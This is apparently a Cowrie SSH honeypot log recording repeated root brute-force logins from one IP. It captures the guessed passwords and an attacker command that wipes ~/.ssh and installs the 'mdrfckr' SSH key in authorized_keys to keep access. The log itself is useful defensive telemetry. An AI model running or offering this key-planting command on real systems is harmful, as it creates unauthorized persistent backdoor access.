{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:09:14.325042Z","src_ip":"129.226.183.73","session":"8c7f6c92e200"}
{"eventid":"cowrie.login.success","username":"root","password":"sa@123456","message":"login attempt [root/sa@123456] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:09:15.365087Z","src_ip":"129.226.183.73","session":"8c7f6c92e200"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:09:15.916728Z","src_ip":"129.226.183.73","session":"8c7f6c92e200"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:09:15.917393Z","src_ip":"129.226.183.73","session":"8c7f6c92e200"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:09:15.918195Z","src_ip":"129.226.183.73","session":"8c7f6c92e200"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:09:16.187503Z","src_ip":"129.226.183.73","session":"8c7f6c92e200"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:09:16.802525Z","src_ip":"129.226.183.73","session":"8c7f6c92e200"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:09:16.803235Z","src_ip":"129.226.183.73","session":"8c7f6c92e200"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:09:17.065483Z","src_ip":"129.226.183.73","session":"8c7f6c92e200"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:09:17.066349Z","src_ip":"129.226.183.73","session":"8c7f6c92e200"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":41098,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd06a502f44f","protocol":"ssh","message":"New connection: 129.226.183.73:41098 (1.2.3.4:22) [session: dd06a502f44f]","sensor":"my-vps","timestamp":"2025-08-24T21:09:17.321634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:09:17.328861Z","src_ip":"129.226.183.73","session":"dd06a502f44f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:09:17.585730Z","src_ip":"129.226.183.73","session":"dd06a502f44f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T21:09:18.619711Z","src_ip":"129.226.183.73","session":"dd06a502f44f"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:09:19.880850Z","src_ip":"129.226.183.73","session":"dd06a502f44f"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":42128,"dst_ip":"1.2.3.4","dst_port":22,"session":"da3009b03520","protocol":"ssh","message":"New connection: 129.226.183.73:42128 (1.2.3.4:22) [session: da3009b03520]","sensor":"my-vps","timestamp":"2025-08-24T21:09:20.150255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:09:20.154108Z","src_ip":"129.226.183.73","session":"da3009b03520"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:09:20.430825Z","src_ip":"129.226.183.73","session":"da3009b03520"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:09:21.529046Z","src_ip":"129.226.183.73","session":"da3009b03520"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:09:21.803891Z","src_ip":"129.226.183.73","session":"da3009b03520"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:09:21.804888Z","src_ip":"129.226.183.73","session":"8c7f6c92e200"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":36916,"dst_ip":"1.2.3.4","dst_port":22,"session":"7caab4b0927e","protocol":"ssh","message":"New connection: 129.226.183.73:36916 (1.2.3.4:22) [session: 7caab4b0927e]","sensor":"my-vps","timestamp":"2025-08-24T21:10:38.151151Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:10:38.156283Z","src_ip":"129.226.183.73","session":"7caab4b0927e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:10:38.410837Z","src_ip":"129.226.183.73","session":"7caab4b0927e"}
{"eventid":"cowrie.login.success","username":"root","password":"pA55word","message":"login attempt [root/pA55word] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:10:39.445058Z","src_ip":"129.226.183.73","session":"7caab4b0927e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:10:40.042715Z","src_ip":"129.226.183.73","session":"7caab4b0927e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:10:40.043507Z","src_ip":"129.226.183.73","session":"7caab4b0927e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:10:40.044801Z","src_ip":"129.226.183.73","session":"7caab4b0927e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:10:40.303042Z","src_ip":"129.226.183.73","session":"7caab4b0927e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:10:40.844375Z","src_ip":"129.226.183.73","session":"7caab4b0927e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:10:40.845273Z","src_ip":"129.226.183.73","session":"7caab4b0927e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:10:41.113094Z","src_ip":"129.226.183.73","session":"7caab4b0927e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:10:41.113967Z","src_ip":"129.226.183.73","session":"7caab4b0927e"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":38092,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f3bde49b28c","protocol":"ssh","message":"New connection: 129.226.183.73:38092 (1.2.3.4:22) [session: 9f3bde49b28c]","sensor":"my-vps","timestamp":"2025-08-24T21:10:41.375803Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:10:41.378372Z","src_ip":"129.226.183.73","session":"9f3bde49b28c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:10:41.643451Z","src_ip":"129.226.183.73","session":"9f3bde49b28c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T21:10:42.708671Z","src_ip":"129.226.183.73","session":"9f3bde49b28c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:10:43.979025Z","src_ip":"129.226.183.73","session":"9f3bde49b28c"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":39234,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8abff87987e","protocol":"ssh","message":"New connection: 129.226.183.73:39234 (1.2.3.4:22) [session: a8abff87987e]","sensor":"my-vps","timestamp":"2025-08-24T21:10:44.245145Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:10:44.255644Z","src_ip":"129.226.183.73","session":"a8abff87987e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:10:44.523222Z","src_ip":"129.226.183.73","session":"a8abff87987e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:10:45.602823Z","src_ip":"129.226.183.73","session":"a8abff87987e"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:10:45.875832Z","src_ip":"129.226.183.73","session":"7caab4b0927e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:10:45.876857Z","src_ip":"129.226.183.73","session":"a8abff87987e"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":34124,"dst_ip":"1.2.3.4","dst_port":22,"session":"e94823ba5450","protocol":"ssh","message":"New connection: 129.226.183.73:34124 (1.2.3.4:22) [session: e94823ba5450]","sensor":"my-vps","timestamp":"2025-08-24T21:11:53.854173Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:11:53.860282Z","src_ip":"129.226.183.73","session":"e94823ba5450"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:11:54.133383Z","src_ip":"129.226.183.73","session":"e94823ba5450"}
{"eventid":"cowrie.login.success","username":"root","password":"wh@123456","message":"login attempt [root/wh@123456] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:11:55.233860Z","src_ip":"129.226.183.73","session":"e94823ba5450"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:11:55.837146Z","src_ip":"129.226.183.73","session":"e94823ba5450"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:11:55.837920Z","src_ip":"129.226.183.73","session":"e94823ba5450"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:11:55.839106Z","src_ip":"129.226.183.73","session":"e94823ba5450"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:11:56.120124Z","src_ip":"129.226.183.73","session":"e94823ba5450"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:11:56.728106Z","src_ip":"129.226.183.73","session":"e94823ba5450"}
